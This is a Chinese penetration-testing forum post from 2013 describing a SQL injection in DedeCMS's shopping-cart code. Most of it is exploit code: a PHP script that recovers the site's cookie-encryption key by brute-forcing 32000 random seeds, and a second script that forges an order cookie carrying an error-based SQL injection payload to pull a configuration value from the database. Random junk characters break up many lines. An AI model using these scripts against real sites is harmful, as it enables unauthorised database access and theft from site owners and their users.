找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 织梦CMS漏洞dedecms漏洞SQL注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2139|回复: 0
打印 上一主题 下一主题

织梦CMS漏洞dedecms漏洞SQL注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-13 23:58:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
www.xxx.com/plus/search.php?keyword=9 J. K* F4 y- j; B
在 include/shopcar.class.php中. c0 m. z4 `4 F& M' ^$ G* A
先看一下这个shopcar类是如何生成cookie的( f, u+ s9 f6 Y) P* J6 t6 S0 e
239      function saveCookie($key,$value)" v, }9 t1 u& _
240      {3 m! T, R# f* @: C, k
241          if(is_array($value))2 u8 z% |: P+ C5 {
242          {' r) m0 V" @! ~# S, V$ U
243              $value = $this->enCrypt($this->enCode($value));
) M) s/ e) k3 J0 s244          }- n4 o: a9 @/ X, c7 G, H
245          else4 L/ D, c5 N/ c1 B. l* S
246          {
( E( B* B; ~( K5 K! x) t! [: R247              $value = $this->enCrypt($value);+ X* q* ^( Z! i" i& v
248          }
4 F- \; _; ?, q, k249          setcookie($key,$value,time()+36000,’/');) _7 y6 w5 h' K1 F7 }) y
250      }
) Z1 I# {! `2 ^简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
! V% y1 \) }5 B. X* T, p$ k% {186      function enCrypt($txt)
$ w6 `, i. z' S. P: O187      {
$ z, n1 ^+ w; V3 [; J$ W188          srand((double)microtime() * 1000000);' F( O5 @% r  w% x/ R
189          $encrypt_key = md5(rand(0, 32000));
9 A" {8 \6 M1 Z) k6 R2 ~9 B0 S, a190          $ctr = 0;
  K  v, \0 i5 V191          $tmp = ”;
5 R1 @2 o; |# j3 l1 N' w4 ~! @192          for($i = 0; $i < strlen($txt); $i++)
3 z5 L: h, A# J2 m! Z# M193          {) ]0 c* k: F: m( b8 m
194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, l- b' h+ Y* ]; D0 _1 x195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);+ e5 _; m# j  A  B5 {
196          }! ^% J. A! x' v3 `, ?9 ]8 G
197          return base64_encode($this->setKey($tmp));
7 J+ Q0 h) o& \: [5 k198      }
+ @4 J0 d' R& b( ^& o; F213      function setKey($txt)9 r) |; }) e1 {- g4 j
214      {7 ?) J: k2 L. O
215          global $cfg_cookie_encode;6 z) E( ^- v: o. ?% H0 K3 r- e
216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
: @  M4 h! j- g! ?( p& f217          $ctr = 0;6 D$ Z% r% c2 X) W
218          $tmp = ”;" \; a9 z  N( F1 `7 k+ V. s
219          for($i = 0; $i < strlen($txt); $i++)
  h# ]+ v+ w- v/ T% i7 s220          {. D' _* R* a0 l1 B& f1 `
221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;. H& I; g' Q" _1 U
222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
8 Q5 a/ ~8 |- A, d( M223          }/ d$ t5 F* m" [% K+ @5 v/ c2 z
224          return $tmp;
: h7 G4 o) m  H; l225      }5 D% i7 x/ V4 X' T) B+ f3 b$ |
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的0 ]& [* R" }* S8 D
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。6 c) a+ l+ _( {/ ?. c: n
具体代码如下:2 }( s+ \5 p1 s7 v5 x" X( {
<?php
8 R/ u( j" L- d) y# K7 Q$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here, ~3 y+ R$ @5 S: I, w1 ~1 s
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
; ?, f; m: k( u0 I, z3 a5 G$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 q$ X; l3 g1 ?4 \, o: Y9 M& Ffunction reStrCode($code,$string)7 d$ e8 p, G' h) u& I
{  b' b& N4 i! w4 [# p- K
$code = base64_decode($code);
/ r; W1 _7 J) ?; M$key = “”;" ^' \' q6 l3 I
for($i=0 ; $i<32 ; $i++)' l- J. \2 j, u+ G6 h0 P) @- E
{7 y8 N; D, r# t, c9 p0 R" w* `* ?& Y
$key .= $string[$i] ^ $code[$i];
' g# X; F; W, ~( S2 h, g3 c}
; `+ x' A' i; I5 |! S+ Q2 Nreturn $key;& e" G: B0 W! G8 I8 L
}; B7 X7 s: j+ O0 a! [6 \' g9 Q
function getKeys($cookie,$plantxt)
1 X7 @$ H: V, l: I5 D{! m# b# g: ]( j- h
$tmp = $cookie;0 T! \0 ~* R/ |( z
$results = array();5 x  z6 v- Q4 @' a: x1 V$ I
for($j=0 ; $j < 32000; $j++)
! K2 F! P/ n, ?+ t* I3 ~{
4 L' ]: F3 D! J2 S) T% ?: r+ m) ]! @# I1 h3 V$ N+ _
$txt = $plantxt;
$ x2 ]0 O) o, z$ctr = 0;) J" G/ x* e1 n% O$ |3 B6 u
$tmp = ”;' E3 G2 g7 i$ I" c. X
$encrypt_key = md5($j);
5 X9 F* w* w0 v: k) Ufor($i =0; $i < strlen($txt); $i ++)
4 R+ i/ C: ]* v& e{3 ~; t; M: k+ h) E9 L# A
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, y# s( r+ G! u. N, |4 a$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
7 f# B, V$ D1 \4 e5 x5 p) O& f}+ S, S" d0 ?. y; w0 H3 S
$string = $tmp;' x0 P6 r2 X$ f8 }, @  I6 ?
$code = $cookie;9 e& v! w2 {, P+ e2 e' N
$result = reStrCode($code,$string);2 l# B7 {9 y1 o
if(eregi(‘^[a-z0-9]+$’,$result))
! h9 Y2 C1 E$ M7 D% R{8 R$ F' Q; S% C6 T# D4 E1 W2 ^5 y
echo $result.”\n”;
# t4 B% h9 Y" m! Y1 O* p- e% k9 f$results[] = $result;3 z* W: Q* Z4 ^* a1 r
}
5 ~. L9 o3 G2 ?+ {4 S- ^" y' w}/ |- x: h- c4 b
return $results;& P/ {$ C; \9 \& z1 v
}# ~! w4 W0 B! j- I- n: t; |
$results1 = getKeys($cookie1,$plantxt);- l' \: Z. _- b# b/ V5 Z! r5 c
$results2 = getKeys($cookie2,$plantxt);
( r8 Y$ X( G2 w0 qprint “\n——————–real key————————–\n”;
  W. u- \5 Q* U- M# c* fforeach($results1 as $test1)* P2 T5 p7 ]. u$ i( N# t- l( V0 n
{6 I% l/ v5 O8 r3 p& f6 O% D  b9 N
foreach($results2 as $test2)
" {7 P* }6 \! x% y' H9 L6 W& g{
& {! O) H% P( \$ a* ~if($test1 == $test2)/ n4 b) j% N6 K& {/ v
{
# C7 v9 r; }- @echo $test1.”\n”;
$ R- H7 c. ]. C9 y/ r9 A; x& m}
! X/ k: q+ i  e% ?}2 I6 K# x& N8 n+ `, N$ Q9 X+ Q
}& k% N" P7 w% S4 ?, u
?>
6 U; f# |- z3 ^, J2 b0 Q6 d4 Tcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
7 t+ ], ^. J$ Qplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua17 h& M, H% I! a- U! ?1 g3 [
然后推算出md5(strtolower($cfg_cookie_encode))/ u9 ]: u* u2 F) P! `
得到这个key之后,我们就可以构造任意购物车的cookie
  X1 ^/ f, g/ Y接着看$ ^) G6 u& R, F: D3 m  ]
20  class MemberShops
/ T1 P/ G5 C' _21  {! b- Q5 O( S$ s9 W: `/ j; N- W. L
22      var $OrdersId;  V6 H% g6 {4 n4 ]! E5 v
23      var $productsId;
: }# I7 G# `, C. z8 z* `8 m% @24' j2 w6 n2 v) K9 w
25      function __construct()
) b- Q7 {$ i% J7 m$ C: t7 I3 e. R26      {' `2 \- s, _2 W
27          $this->OrdersId = $this->getCookie(“OrdersId”);
2 ?6 g: n' ?- H, T28          if(empty($this->OrdersId))$ D! t. o, y/ k  b' a+ i- e& j' u2 b9 H$ A9 Y
29          {
; e+ u' o/ v! f! v30              $this->OrdersId = $this->MakeOrders();  ~0 D) V1 V0 ^  n8 h0 @5 M5 e
31          }
6 @; _: T! g; L! C32      }
$ p6 f5 B: @1 Z" j" L; a( ]发现OrderId是从cookie里面获取的
3 g& {0 j+ D8 X0 p然后
& S- }9 Z; O/ ^# w1 ~/plus/carbuyaction.php中的
9 p! x* [, ]8 l+ K$ C, `( a+ z29      $cart    = new MemberShops();5 }. s: C! g" s, h9 h
39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
, Z1 N$ f! N. }……- m+ t9 S% c. m8 F: v% s6 @8 ^; o0 J
173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);$ ?5 z. M) L# P# v7 |: M! X9 W
接着我们就可以注入了) C" m% l  _( L( p
通过利用下面代码生成cookie:
: R& v" Q+ A+ d- [<?php3 o+ @- B& M# q3 W
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;5 ~$ R# N2 k5 G- q0 [; v  {% h
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
, Q0 m& Y0 _% l5 Q7 Hfunction setKey($txt)* p' S; a6 P: P9 m& s
{
7 W( w$ \1 T. W: J6 r, m) C$ Xglobal $encrypt_key;
! q! ]7 c. u' o9 k! `$ctr = 0;
: c/ S4 ^  }! e$tmp = ”;
9 b& [7 i: C1 ]- o% ?  _, ?for($i = 0; $i < strlen($txt); $i++)( N6 C5 T* s  ^8 F. }. Y4 F
{
* s9 h5 m; ?7 k& h- \$ ]$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
! r0 k; [4 S. A4 d) g% q$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
+ C/ Z& e2 Z( l- y+ C9 H}2 V& P4 L; p6 @/ g/ Z
return $tmp;
- u( \" j, u7 m}2 d, a$ V# p! s/ D
function enCrypt($txt)
/ @8 \! J8 _  m" C: e{$ s3 b7 u( {" j# o) c
srand((double)microtime() * 1000000);
+ A5 e9 i" D1 Q" b) ~  [: P+ W, H$encrypt_key = md5(rand(0, 32000));  S1 o3 v) L% H9 C& O
$ctr = 0;) P$ x3 O+ p; _  Y" D( j
$tmp = ”;
8 r' `; W' B7 Yfor($i = 0; $i < strlen($txt); $i++)
" y7 G! r! ?, X  z$ t{5 `  g" o  v' b6 A. J4 n9 r% S% P  B
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# @- C& Z0 O, G) b( z+ V
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 ], i) g0 c7 e1 A. E: \
}
6 _$ m9 q2 S8 I1 Breturn base64_encode(setKey($tmp));
. q9 K. V) p  ~  _& s7 ]# j}9 m/ P, F% c* ~. Q' ?/ a
for($dest =0;$dest = enCrypt($txt);): X; B7 ]6 u7 R/ ~
{
( p$ ]) i" e. l: ^, O  qif(!strpos($dest,’+'))
' K9 }3 V/ z+ d1 v/ K) b6 ]{
3 e. |; w' w# T3 s% Q" X8 Mbreak;( D* Z0 g7 F! l; G6 ^
}0 s$ c* x1 O  N1 m
}
, p7 x7 ~, h7 ^& |+ B# Z6 _) cecho $dest.”\n”;
: D; }& ^2 `, o$ ^2 S?>
7 q- G. K7 x, }( O9 T! D, P7 {5 y! u3 M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表